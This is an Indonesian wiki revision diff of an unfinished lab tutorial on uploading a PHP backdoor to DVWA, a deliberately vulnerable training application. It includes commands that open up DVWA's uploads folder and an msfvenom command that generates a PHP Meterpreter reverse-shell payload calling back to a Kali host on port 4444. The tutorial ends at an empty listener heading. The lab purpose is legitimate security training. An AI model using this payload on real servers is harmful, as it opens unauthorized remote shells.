Difference between revisions of "DVWA: Upload PHP Backdoor"

From OnnoWiki
Jump to navigation Jump to search
Line 12: Line 12:
 
==Di Kali Linux==
 
==Di Kali Linux==
  
Cek ip address
+
===Cek ip address===
  
 
  ifconfig
 
  ifconfig
Line 18: Line 18:
 
Misalnya IP address kali linux adalah 192.168.0.2
 
Misalnya IP address kali linux adalah 192.168.0.2
  
Buat PHP msfpayload
+
===Buat PHP msfpayload===
  
 
  mkdir -p /root/backdoor
 
  mkdir -p /root/backdoor
Line 24: Line 24:
 
  msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php
 
  msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php
 
  ls -l PHONE_HOME.php
 
  ls -l PHONE_HOME.php
 +
 +
 +
===Start Payload Listener===
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html
 
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html

Revision as of 09:33, 27 May 2017

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html

Di Server DVWA

Ubah ijin folder uploads

sudo su
chown www-data.www-data /var/www/html/DVWA-1.9/hackable/uploads/
chmod 775 /var/www/html/DVWA-1.9/hackable/uploads/
ls -ld /var/www/html/DVWA-1.9/hackable/uploads/

Di Kali Linux

Cek ip address

ifconfig

Misalnya IP address kali linux adalah 192.168.0.2

Buat PHP msfpayload

mkdir -p /root/backdoor
cd /root/backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php
ls -l PHONE_HOME.php


Start Payload Listener

Referensi